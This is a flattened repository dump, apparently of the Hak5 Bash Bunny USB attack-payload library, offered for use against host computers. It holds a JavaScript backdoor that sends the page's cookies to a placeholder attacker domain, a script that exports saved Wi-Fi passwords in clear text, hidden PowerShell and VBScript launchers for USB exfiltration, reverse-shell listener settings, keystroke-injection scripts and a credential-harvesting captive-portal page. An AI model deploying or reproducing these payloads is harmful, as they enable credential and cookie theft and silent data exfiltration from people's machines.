├── .gitignore ├── payloads ├── library │ ├── RAZ_VBScript │ │ ├── listener_port.txt │ │ ├── listener_ip.txt │ │ └── payload.txt │ ├── RAZ_ReverseShell │ │ ├── listener_port.txt │ │ ├── listener_ip.txt │ │ └── payload.txt │ ├── tools_installer │ │ ├── tools_to_install │ │ │ ├── responder │ │ │ │ ├── logs │ │ │ │ │ └── .gitignore │ │ │ │ ├── poisoners │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── MDNS.py │ │ │ │ │ └── NBTNS.py │ │ │ │ ├── servers │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── POP3.py │ │ │ │ │ ├── IMAP.py │ │ │ │ │ ├── FTP.py │ │ │ │ │ ├── SMTP.py │ │ │ │ │ └── DNS.py │ │ │ │ ├── tools │ │ │ │ │ ├── MultiRelay │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── creddump │ │ │ │ │ │ │ ├── README │ │ │ │ │ │ │ ├── framework │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── win32 │ │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ │ └── rawreg.py │ │ │ │ │ │ │ │ └── types.py │ │ │ │ │ │ │ ├── CHANGELOG │ │ │ │ │ │ │ ├── pwdump.py │ │ │ │ │ │ │ ├── cachedump.py │ │ │ │ │ │ │ └── lsadump.py │ │ │ │ │ │ └── relay-dumps │ │ │ │ │ │ │ └── .gitignore │ │ │ │ │ ├── SMBFinger │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── odict.py │ │ │ │ │ ├── FindSQLSrv.py │ │ │ │ │ ├── DHCP_Auto.sh │ │ │ │ │ └── FindSMB2UPTime.py │ │ │ │ ├── .gitignore │ │ │ │ ├── files │ │ │ │ │ ├── BindShell.exe │ │ │ │ │ └── AccessDenied.html │ │ │ │ ├── certs │ │ │ │ │ ├── gen-self-signed-cert.sh │ │ │ │ │ ├── responder.crt │ │ │ │ │ └── responder.key │ │ │ │ ├── DumpHash.py │ │ │ │ ├── fingerprint.py │ │ │ │ └── Responder.conf │ │ │ └── impacket │ │ │ │ ├── impacket │ │ │ │ ├── krb5 │ │ │ │ │ └── __init__.py │ │ │ │ ├── ldap │ │ │ │ │ └── __init__.py │ │ │ │ ├── dcerpc │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── v5 │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── dcom │ │ │ │ │ │ └── __init__.py │ │ │ │ ├── examples │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ntlmrelayx │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── utils │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── tcpshell.py │ │ │ │ │ │ │ └── config.py │ │ │ │ │ │ ├── servers │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── clients │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── imaprelayclient.py │ │ │ │ │ │ │ └── httprelayclient.py │ │ │ │ │ └── logger.py │ │ │ │ ├── testcases │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── SMB_RPC │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── dcetests.cfg │ │ │ │ │ │ ├── rundce.sh │ │ │ │ │ │ └── test_nmb.py │ │ │ │ │ ├── ImpactPacket │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ │ ├── test_TCP_bug_issue7.py │ │ │ │ │ │ └── test_IP6.py │ │ │ │ │ └── dot11 │ │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ │ ├── test_wps.py │ │ │ │ │ │ ├── test_helper.py │ │ │ │ │ │ ├── test_FrameControlACK.py │ │ │ │ │ │ ├── test_FrameControlCTS.py │ │ │ │ │ │ ├── test_FrameControlRTS.py │ │ │ │ │ │ ├── test_FrameControlCFEnd.py │ │ │ │ │ │ ├── test_FrameControlPSPoll.py │ │ │ │ │ │ ├── test_FrameControlCFEndCFACK.py │ │ │ │ │ │ ├── test_Dot11Decoder.py │ │ │ │ │ │ └── test_RadioTapDecoder.py │ │ │ │ ├── version.py │ │ │ │ ├── __init__.py │ │ │ │ ├── Dot11Crypto.py │ │ │ │ ├── eap.py │ │ │ │ ├── Dot11KeyManager.py │ │ │ │ └── uuid.py │ │ │ │ ├── MANIFEST.in │ │ │ │ ├── .gitignore │ │ │ │ ├── examples │ │ │ │ ├── uncrc32.py │ │ │ │ ├── mssqlinstance.py │ │ │ │ ├── opdump.py │ │ │ │ ├── loopchain.py │ │ │ │ ├── sniffer.py │ │ │ │ ├── ping6.py │ │ │ │ ├── smbserver.py │ │ │ │ ├── ping.py │ │ │ │ └── mqtt_check.py │ │ │ │ ├── setup.py │ │ │ │ └── README.md │ │ ├── payload.txt │ │ ├── readme.txt │ │ └── install.sh │ ├── BunnyTap │ │ ├── js │ │ │ ├── ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js │ │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.2__scriptaculous.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.9.0__scriptaculous.js │ │ │ └── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.3__scriptaculous.js │ │ ├── alexa1m.sh │ │ ├── target_backdoor.js │ │ ├── install.sh │ │ ├── payload.txt │ │ ├── README.md │ │ └── backend_server.js │ ├── ExecutableInstaller │ │ ├── i.vbs │ │ ├── d.cmd │ │ ├── payload.txt │ │ ├── readme.md │ │ └── e.cmd │ ├── usb_exfiltrator │ │ ├── i.vbs │ │ ├── d.cmd │ │ ├── payload.txt │ │ ├── readme.md │ │ └── e.cmd │ ├── Captiveportal │ │ ├── captiveportal │ │ ├── portal.html │ │ ├── README.md │ │ └── payload.txt │ ├── DuckyInstall │ │ ├── payload.txt │ │ ├── DuckToolkit-1.0.1.tar.gz │ │ ├── readme.txt │ │ └── install.sh │ ├── WiPassDump │ │ ├── a.cmd │ │ ├── readme.md │ │ └── payload.txt │ ├── payloads.txt │ ├── DuckyTemplate │ │ ├── ducky_script.txt │ │ ├── payload.txt │ │ └── readme.md │ ├── 90sMode │ │ ├── payload.txt │ │ └── readme.md │ ├── SmacAndGrab │ │ ├── readme.md │ │ └── payload.txt │ ├── macinfograbber │ │ ├── readme.md │ │ └── payload.txt │ ├── rdp_checker │ │ ├── install.sh │ │ ├── readme.md │ │ └── payload.txt │ ├── MacReverseShell │ │ ├── readme.md │ │ └── payload.txt │ ├── nmapper │ │ ├── readme.md │ │ └── payload.txt │ ├── QuickCreds │ │ ├── readme.md │ │ └── payload.txt │ ├── GitBunnyGit │ │ ├── README.md │ │ └── payload.txt │ └── bunny_helpers.sh ├── switch2 │ └── payload.txt └── switch1 │ └── payload.txt └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/listener_port.txt: -------------------------------------------------------------------------------- 1 | 4444 -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/listener_port.txt: -------------------------------------------------------------------------------- 1 | 4444 -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/listener_ip.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.100 -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/listener_ip.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.100 -------------------------------------------------------------------------------- /payloads/switch2/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE RNDIS_ETHERNET 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/switch1/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE ECM_ETHERNET STORAGE 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/krb5/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/ldap/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/v5/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/v5/dcom/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/alexa1m.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/.gitignore: -------------------------------------------------------------------------------- 1 | # Responder logs 2 | *.db 3 | *.txt 4 | *.log 5 | 6 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/Captiveportal/captiveportal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/Captiveportal/captiveportal -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/payload.txt: -------------------------------------------------------------------------------- 1 | # Install payload for the DuckToolkit 2 | # See install.sh and readme.txt for details 3 | ATTACKMODE ECM_ETHERNET STORAGE 4 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include MANIFEST.in 2 | include LICENSE 3 | include ChangeLog 4 | recursive-include examples *.txt *.py 5 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/DuckToolkit-1.0.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/DuckyInstall/DuckToolkit-1.0.1.tar.gz -------------------------------------------------------------------------------- /payloads/library/WiPassDump/a.cmd: -------------------------------------------------------------------------------- 1 | REM Go to dump directory 2 | cd /d %~dp0 3 | cd ../../loot/WiPassDump/ 4 | 5 | REM Dump saved Wi-Fi infos 6 | netsh wlan export profile key=clear -------------------------------------------------------------------------------- /payloads/library/payloads.txt: -------------------------------------------------------------------------------- 1 | Update this library with the latest payload set from the Bash Bunny community and learn more about creating and publishing your own payloads at https://www.bashbunny.com 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/servers/__init__.py: -------------------------------------------------------------------------------- 1 | from httprelayserver import HTTPRelayServer 2 | from smbrelayserver import SMBRelayServer 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/payload.txt: -------------------------------------------------------------------------------- 1 | # All of the heavy lifting of this payload occurs in install.sh 2 | # which gets renamed to install.sh.INSTALLED once completed. 3 | ATTACKMODE SERIAL STORAGE 4 | -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/ducky_script.txt: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI r 3 | DELAY 1000 4 | STRING notepad.exe 5 | DELAY 100 6 | ENTER 7 | DELAY 3000 8 | STRING https://bunnytoolkit.com running Ducky Script on a Bash Bunny 9 | Enter -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/gen-self-signed-cert.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl genrsa -out responder.key 2048 3 | openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/" 4 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/__init__.py: -------------------------------------------------------------------------------- 1 | from mssqlrelayclient import MSSQLRelayClient 2 | from smbrelayclient import SMBRelayClient 3 | from ldaprelayclient import LDAPRelayClient 4 | from httprelayclient import HTTPRelayClient 5 | from imaprelayclient import IMAPRelayClient -------------------------------------------------------------------------------- /payloads/library/BunnyTap/target_backdoor.js: -------------------------------------------------------------------------------- 1 | /* This javascript is prepended and cached to many common JS files on the web such as Google's CDN files, found in the poisontap/js/ directory. 2 | * By default, it logs the domain's cookies. Change 'YOUR.DOMAIN' to your domain. 3 | */ 4 | new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies; 5 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/CHANGELOG: -------------------------------------------------------------------------------- 1 | Version: 0.3 Date: 8/1/2012 2 | 3 | * Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius. 4 | Closes Issue 3. 5 | 6 | Version: 0.2 Date: 2/24/2011 7 | 8 | * Fixed issue with wrong format specifier being used (L instead of I), which 9 | caused creddump to fail on 64-bit systems. 10 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/dcetests.cfg: -------------------------------------------------------------------------------- 1 | [global] 2 | 3 | [TCPTransport] 4 | servername = 5 | machine = 172.16.123.232 6 | username = test 7 | password = test 8 | hashes = 9 | aesKey256 = 10 | aesKey128 = 11 | domain = 12 | [SMBTransport] 13 | servername = 14 | machine = 172.16.123.232 15 | username = test 16 | password = test 17 | hashes = 18 | aesKey256 = 19 | aesKey128 = 20 | domain = 21 | 22 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/version.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | 8 | VER_MAJOR = "0" 9 | VER_MINOR = "9.16-dev" 10 | 11 | BANNER = "Impacket v%s.%s - Copyright 2002-2016 Core Security Technologies\n" % (VER_MAJOR,VER_MINOR) 12 | 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload Library for the Bash Bunny by Hak5 2 | 3 | ![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") 4 | 5 | * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") 6 | * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") 7 | * [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums") 8 | * IRC: irc.hak5.org #BashBunny 9 | -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/payload.txt: -------------------------------------------------------------------------------- 1 | LED G 2 | ATTACKMODE HID STORAGE 3 | 4 | # Set your language here 5 | LANGUAGE='us' 6 | 7 | LED R G 8 | # Check for switch position to make it easier for us. 9 | source bunny_helpers.sh 10 | 11 | if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then 12 | QUACK ${SWITCH_POSITION}/ducky_script.txt 13 | LED G 14 | else 15 | LED R 16 | echo "Unable to load ducky_script.txt" >> /root/debuglog.txt 17 | exit 1 18 | fi 19 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/portal.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Captive Portal 4 | 9 | 10 | 11 |

Captive Portal

12 |
13 | Username:
14 | Password:
15 | 16 |
17 | 18 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/readme.txt: -------------------------------------------------------------------------------- 1 | DuckToolkit installer for Bash Bunny. 2 | Adds support for new languages. and uses the Ducktoolkit python library for encoding. 3 | 4 | Version 1.0.0 5 | 6 | Moves the libary files to /tools 7 | Update Q and QUACK to point to the new library 8 | Writes error to /root/ducky.log 9 | 10 | Purple Blinking.................Moving tools 11 | Purple Solid....................Tools moved 12 | Amber Blinking..................Setup tools 13 | Red Solid.......................Tool installation failed 14 | White Solid.....................Installation completed successfully 15 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/readme.txt: -------------------------------------------------------------------------------- 1 | Tools Installer for Bash Bunny 2 | Version 1.1.0 3 | 4 | Moves tools from the tools_to_install/ USB disk to /pentest on the Bash Bunny 5 | When installation succeeds, install.sh will be renamed to install.sh.INSTALLED 6 | 7 | A list of installed tools is created on the USB disk as installed-tools.txt 8 | 9 | Purple Blinking.................Moving tools 10 | Purple Solid....................Tools moved 11 | Amber Blinking..................Setup tools 12 | Red Solid.......................Tool installation failed 13 | White Solid.....................Installation completed successfully -------------------------------------------------------------------------------- /payloads/library/90sMode/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: 90s Mode 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Category: Prank 7 | # Target: Windows XP SP3+ 8 | # 9 | # Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 10 | # Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition, 11 | 12 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 13 | source bunny_helpers.sh 14 | 15 | LED R B 16 | ATTACKMODE HID STORAGE 17 | QUACK GUI r 18 | QUACK DELAY 100 19 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')" 20 | QUACK ENTER 21 | LED G -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/readme.md: -------------------------------------------------------------------------------- 1 | # Ducky Script Template for Bash Bunnys 2 | 3 | Author: @kevthehermit 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Boiler Plate for running ducky scripts on the Bash Bunny 9 | 10 | ## Configuration 11 | 12 | HID or HID STORAGE 13 | 14 | ## Requirements 15 | 16 | Install DuckToolkit payload for extra language support 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ---------------- | ------------------------------------- | 22 | | Red | Failed to open script file | 23 | | Amber | Script Running | 24 | | Green | Finished | 25 | 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/rundce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | python test_rpcrt.py 9 | python test_scmr.py 10 | python test_epm.py 11 | python test_samr.py 12 | python test_wkst.py 13 | python test_srvs.py 14 | python test_lsad.py 15 | python test_lsat.py 16 | python test_rrp.py 17 | python test_mgmt.py 18 | python test_ndr.py 19 | python test_drsuapi.py 20 | python test_wmi.py 21 | python test_dcomrt.py 22 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/readme.md: -------------------------------------------------------------------------------- 1 | # sMacAndGrab 2 | 3 | Author: audibleblink 4 | Version: Version 1.1 5 | Target: macOS 6 | 7 | ## Description 8 | 9 | Mounts as storage and acts as HID. Backup a list of files to the BashBunny 10 | 11 | ## Configuration 12 | 13 | Provide a newline-separated list of files you want to backup and wait for the green light. 14 | You can also provide `find` and `grep` commands as literal strings to pass to QUACK which get run on TARGET. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Amber (blinking) | Attacking | 21 | | Green | Finished | 22 | 23 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: USB Exfiltration 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Target: Windows XP SP3+ 7 | # Props: Diggster, IMcPwn 8 | # 9 | # Executes d.cmd from 